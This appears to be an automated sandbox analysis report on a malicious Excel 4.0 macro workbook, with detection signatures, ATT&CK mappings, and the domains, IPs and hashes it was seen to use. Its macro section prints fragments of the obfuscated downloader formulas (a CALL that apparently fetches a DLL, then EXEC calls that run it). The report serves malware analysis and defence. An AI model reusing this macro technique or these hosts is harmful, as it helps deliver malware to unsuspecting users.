Analysis Report documents-1660683173.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Allocates a big amount of memory (probably used for heap spraying)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Machine Learning detection for dropped file |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) |
Source: | File created: | Jump to behavior |
Document exploit detected (drops PE files) |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | Memory has grown: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) |
Source: | Snort IDS: |
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Office process drops PE file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML | |||
100% | Joe Sandbox ML |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kautilyaclasses.com | 192.185.56.250 | true | false | unknown | |
bodylanguage.santulan.co.in | 111.118.215.222 | true | true | unknown | |
corwin-tommie06f.ru.com | 8.211.4.209 | true | false | unknown | |
katelynn9506a.ru.com | 8.211.4.209 | true | false | unknown | |
kullumanalitours.com | 103.211.216.55 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | unknown |
| false | | unknown |
| false | | unknown |
| true | | unknown |
| false | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | low |
Contacted IPs |
---|
(Contacted IPs world map; legend buckets: No. of IPs < 25%, 25% to 50%, 50% to 75%, above 75%)
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
103.211.216.55 | kullumanalitours.com | Seychelles | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false |
192.185.56.250 | kautilyaclasses.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | false |
8.211.4.209 | corwin-tommie06f.ru.com | Singapore | | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false |
111.118.215.222 | bodylanguage.santulan.co.in | India | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382825 |
Start date: | 06.04.2021 |
Start time: | 18:00:12 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 43s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | documents-1660683173.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLSM@11/12@5/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
8.211.4.209 | 12 associated samples (names and hashes not present in this export) | | malicious | Browse | |
111.118.215.222 | 1 associated sample (name and hash not present in this export) | | malicious | Browse | |
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | 20 associated samples (names and hashes not present in this export) | | malicious | Browse | |
UNIFIEDLAYER-AS-1US | 20 associated samples (names and hashes not present in this export) | | malicious | Browse | |
PUBLIC-DOMAIN-REGISTRYUS | 20 associated samples (names and hashes not present in this export) | | malicious | Browse | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 124025 |
Entropy (8bit): | 5.93057231705895 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | 670BD3713D1FC5F4B0766C4ABADA5CCC |
SHA1: | FF7F7D9AB1494A4BA3EEB4F942E68D69A96F4771 |
SHA-256: | AF81590CA263392F0124D318604A06785F88696FA623DD16A6C57F6E22A1BD65 |
SHA-512: | 6155E4D073C160CA1DD65590D0BA21E49A999F1E708D0E5BF542776B6F0840CD1991E40BE9D8E56E56224A1576616FAA46680DFE565E054E39E946608ACAC58D |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | http://bodylanguage.santulan.co.in/ds/index.html |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8854 |
Entropy (8bit): | 7.949751503848125 |
Encrypted: | false |
SSDEEP: | 192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj |
MD5: | 780FD0ABF9055E2D8FA1BAB6D4B9163E |
SHA1: | CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE |
SHA-256: | 6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2 |
SHA-512: | 8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8301 |
Entropy (8bit): | 7.970711494690041 |
Encrypted: | false |
SSDEEP: | 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh |
MD5: | D8574C9CC4123EF67C8B600850BE52EE |
SHA1: | 5547AC473B3523BA2410E04B75E37B1944EE0CCC |
SHA-256: | ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B |
SHA-512: | 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96845 |
Entropy (8bit): | 7.870661659091498 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgJc:GJIW9bTdS7lMHfD9ByrtyOG7ZVxEt |
MD5: | 3479245B9F33A9E1F03900890125DEE3 |
SHA1: | 68E5533F4FBB045D7D6A84D63DB09ECB7B670CCE |
SHA-256: | 21715C2FC085ADB028AB1E5A73B0F815B69DB64F7FFABB41242B1C6C3A43C03C |
SHA-512: | 8E4928A0FBFE36512648002E3E6FE1A52FDEECABE83603DB85FDD5764537B65AE77E43E626F332BB647B13F9CA4B1AFC97B9360492C155946C44BBA35DB9B7D0 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.4687971528838295 |
Encrypted: | false |
SSDEEP: | 12:85QAvcLgXg/XAlCPCHaXgzB8IB/vyPUAX+Wnicvb8X+bDtZ3YilMMEpxRljKwXcs:85I/XTwz6IgYePDv3qdwrNru/ |
MD5: | 7F920880AA695C9DF2B102FB03974AEF |
SHA1: | 63965E298D95CCBC4EF5866EA811AAFDB3E7EB22 |
SHA-256: | E8B89A78169A51E950A368A0BFDC22BFD7E3080CAC8FC79A49ABC22BC5CB17A6 |
SHA-512: | C02C1BDC2E42B999AC7D4CA46480A10373A9B711B3C75D8C2820D8966E0DB8A48321C869F3D2E659601369C3EF0FF9A37877410AF9AA47F03AA0606FB78CB29A |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2138 |
Entropy (8bit): | 4.528643007870141 |
Encrypted: | false |
SSDEEP: | 48:8B/XT3Ik7WZhwIqQh2B/XT3Ik7WZhwIqQ/:8B/XLIk7W4IqQh2B/XLIk7W4IqQ/ |
MD5: | AC01E803A9FED5CEA946118AD8320EDD |
SHA1: | 90AF5745FC9946CD42CC1220C057AA9048E49582 |
SHA-256: | C1581D468241CD0ECEA9A02E5CD3E97C40613BAE7A5AF2DC3634B96F4AE7DC91 |
SHA-512: | D85F6C3799893ACE3C68564C8CB8E01200D7C28EA518466595A434B5A2CEA6F07DF4BC91802BE0426BC40FE0DB2497BCFFEE156EB87EBD64BA206486B9F6CB6F |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115 |
Entropy (8bit): | 4.693504916588958 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWKS9LRmnpzCZELRmnpzCmxWKS9LRmnpzCv:dj49LcBgELcBC9LcBs |
MD5: | 8380702CB2A3A628F83F6844DDF7E8D9 |
SHA1: | A7BDA2F60F42F4D202BFEA470BE141F6C2260F8A |
SHA-256: | B6F458D5D03DD31FE1299F4B4FEAB548379FB19B473B8CE0613ADE00E73EB421 |
SHA-512: | 0269950A40CD2B18001CC1ACE3EB00731A498B9B11866ECDAA36A9724C7286261BF2782361DD10DE8DEE58E070241B47F835D0DB390C922A7165E97B6DDE8EB5 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 96845 |
Entropy (8bit): | 7.870661659091498 |
Encrypted: | false |
SSDEEP: | 1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgJc:GJIW9bTdS7lMHfD9ByrtyOG7ZVxEt |
MD5: | 3479245B9F33A9E1F03900890125DEE3 |
SHA1: | 68E5533F4FBB045D7D6A84D63DB09ECB7B670CCE |
SHA-256: | 21715C2FC085ADB028AB1E5A73B0F815B69DB64F7FFABB41242B1C6C3A43C03C |
SHA-512: | 8E4928A0FBFE36512648002E3E6FE1A52FDEECABE83603DB85FDD5764537B65AE77E43E626F332BB647B13F9CA4B1AFC97B9360492C155946C44BBA35DB9B7D0 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 124025 |
Entropy (8bit): | 5.93057231705895 |
Encrypted: | false |
SSDEEP: | 1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W |
MD5: | 670BD3713D1FC5F4B0766C4ABADA5CCC |
SHA1: | FF7F7D9AB1494A4BA3EEB4F942E68D69A96F4771 |
SHA-256: | AF81590CA263392F0124D318604A06785F88696FA623DD16A6C57F6E22A1BD65 |
SHA-512: | 6155E4D073C160CA1DD65590D0BA21E49A999F1E708D0E5BF542776B6F0840CD1991E40BE9D8E56E56224A1576616FAA46680DFE565E054E39E946608ACAC58D |
Malicious: | true |
Antivirus: |
|
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.882184978149695 |
TrID: |
|
File name: | documents-1660683173.xlsm |
File size: | 96877 |
MD5: | cf8cbce9bb25d9081b2da19c6f1c1c70 |
SHA1: | e014ec63d11a673fd6a655cb20055a723eba2fe5 |
SHA256: | 9a59e089d7b593c0b0651ad43945f19c10c67719b7e01814f4007f253db6e286 |
SHA512: | 6c46ff93eedaff43cd9834602739d961a78f9d55148893d570343b2b9a01b99f6a9fd7df3f7ede0a954300f5372d89caf5129aea6f60c87ab3cf212fa631b705 |
SSDEEP: | 1536:491M4Kfra8zxQz8jbztonsBjFC6QomaIRUxPLe96bGAfe2hawno:491M4kra8Wz8jbzSn4BC6Qdkx60WMo |
File Content Preview: | PK..........!...`.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "documents-1660683173.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\oeiwkd""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM23,before.2.0.0.sheet!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM24,before.2.0.0.sheet!AO15&""1""&"".dll"",0,0)",,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND
()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/06/21-18:01:05.779242 | TCP | 2009897 | ET TROJAN Possible Windows executable sent when remote host claims to send html content | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 6, 2021 18:01:02.122705936 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:02.161501884 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:02.161607981 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209 |
